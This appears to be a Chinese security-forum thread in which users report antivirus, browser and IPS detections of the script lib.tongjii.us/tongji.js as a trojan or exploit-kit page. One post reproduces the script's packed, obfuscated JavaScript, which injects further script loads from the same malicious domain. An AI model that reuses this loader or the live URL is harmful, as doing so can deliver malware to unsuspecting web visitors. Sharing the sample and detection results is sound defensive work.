http://lib.tongjii.us/tongji.js

cz88

14.04.2017 11.49.51;下载被阻止;http://lib.tongjii.us/tongji.js;Trojan.JS.Agent.dvy;
[url=http://lib.tongjii.us/tongji.js;TheWorld;]http://lib.tongjii.us/tongji.js
;TheWorld;[/url]木马程序;04/14/2017 11:49:51



http://lib.tongjii.us/tongji.js

KevinYu0504

tongji.js

Chrome 浏览器已出现警示

将 tongji.js 档案下载下来后 :


AVG : 一起动扫瞄，档案随即自动消失，但软件显示未侦测到，不知是否是 js 档案自杀

HitmanPro : Miss

Malwarebytes : Miss

Zemana : Trojan:Generic/Fitzia.A!Irlt

SecureAPlus : 显示为 McAfee 扫瞄到 JS/DNSChanger.I torjan 威胁

RUAOT

网页检测

HacPeswl

Malware

被uBlock里面订阅的一个规则库给拦截了，估计这整个网站都不是什么好东西

Yuri1st

断簪

KES
事件类型:     检测到恶意对象
应用程序\名称:     Firefox
应用程序\路径:     d:\mozilla firefox\
应用程序\进程 ID:     3560
用户:     DUANZAN\HP (活动用户)
组件:     网页反病毒
结果\描述:     检测到威胁
结果\类型:     木马程序
结果\名称:     Trojan.JS.Agent.dvy
结果\威胁级别:     高
结果\精确度:     确切
对象:     http://lib.tongjii.us/tongji.js//tongji
对象\类型:     网页
对象\路径:     http://lib.tongjii.us/tongji.js//
对象\名称:     tongji

ELOHIM

[mw_shl_code=html,true]eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1f(14(p,a,c,k,e,r){e=14(c){13(c<a?\'\':e(1d(c/a)))+((c=c%a)>1e?19.1g(c+29):c.1a(1c))};15(!\'\'.17(/^/,19)){18(c--)r[e(c)]=k[c]||e(c);k=[14(e){13 r[e]}];e=14(){13\'\\\\w+\'};c=1};18(c--)15(k[c])p=p.17(16 1b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);13 p}(\'7(x(e)=="A"||e==k||e==K){e=L;9 b=3.N(\\\'v\\\');7(b!=k&&b.c!=k){b.c=\\\'\\\';3.d.M(b)}9 z=Q.R.T();9 y=/W 6/.Y(z);7(!y){Z={$11:\\\'v\\\'};$J={};9 2=3.g(\\\'h\\\');2.c=\\\'i://O.P.12/2/w/1.8/w.U.2\\\';2.m(\\\'n\\\',\\\'f-8\\\');7(x B==\\\'A\\\'){(3.q("u")[0]||3.d).s(2);2.t=2.r=p(){7(2&&2.5&&2.5!="j"&&2.5!="o"){l}B.S();9 a=3.g(\\\'h\\\');a.c=\\\'i://I.C.D/E.2?X=\\\'+F G().H();a.m(\\\'n\\\',\\\'f-8\\\');(3.q("u")[0]||3.d).s(a);a.t=a.r=p(){7(a&&a.5&&a.5!="j"&&a.5!="o"){l}}}}10{9 4=3.g(\\\'h\\\');4.c=\\\'i://I.C.D/E.2?V=\\\'+F G().H();4.m(\\\'n\\\',\\\'f-8\\\');(3.q("u")[0]||3.d).s(4);4.t=4.r=p(){7(4&&4.5&&4.5!="j"&&4.5!="o"){l}}}}}\',1h,1i,\'||1j|1k|1l|1m||15||1n||1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|13|1y|1z|1A|14|1B|1C|1D|1E|1F|1G|1H|1I|1J|1K|1L|1M|1N|1O|1P|16|1Q|1R|1S|1T|1U|1V|1W|1X|1Y|1Z|20|21|22|23|24|25|26|27|28|2a|2b|2c|2d\'.2e(\'|\'),0,{}))',62,139,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|if|new|replace|while|String|toString|RegExp|36|parseInt|35|eval|fromCharCode|62|65|js|document|js_b|readyState|var|seed|src|body|sbj_new_loading|utf|createElement|script|http|loaded|null|setAttribute|charset|complete|getElementsByTagName|onreadystatechange|appendChild|onload|head|tongjiTool|jquery|typeof|isIE6|_ua|undefined|jQuery|tongjii|us|show1|Date|getDate|cn|_GLOBAL|false|true|removeChild|getElementById|lib|sinaapp|navigator|userAgent|noConflict|toLowerCase|min|r2|msie|r1|test||scope|else|pageid|com|split'.split('|'),0,{}))[/mw_shl_code]
我也不知道这样到底是不是中招了。。

星云劫

URL已被SpIDer Gate阻止
lib.tongjii.us
原因：        病毒传播源
日期：        2017/4/16/星期日 19:19

SpIDer Gate网络反病毒软件的设置是阻止为已知病毒传播源的网络资源。

如需更改阻止参数，请访问SpIDer Gate设置。URL阻止设置关闭操作详细信息

如果您认为此URL不是病毒传播源，请通知我们。

超超~.~

我把卡饭加到了NS防火墙的拦截规则里，看卡饭就关了防火墙，刚才试毒网竟然忘记打开NS防火墙，但是幸好IPS给拦截了。

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2017/4/16 20:53:32,高,阻止了 lib.tongjii.us 的入侵企图,已阻止,不需要操作,Web Attack: Exploit kit Website 8,不需要操作,不需要操作,"lib.tongjii.us (103.230.122.162, 80)",lib.tongjii.us/tongji.js,"DESKTOP-BQ3823S (115.24.164.134, 61658)",lib.tongjii.us (103.230.122.162),"TCP, www-http"
来自 <b>lib.tongjii.us/tongji.js</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\CENTBROWSER\APPLICATION\CHROME.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

超超~.~

星云劫 发表于 2017-4-16 19:19
URL已被SpIDer Gate阻止
lib.tongjii.us
原因：        病毒传播源

好久不见。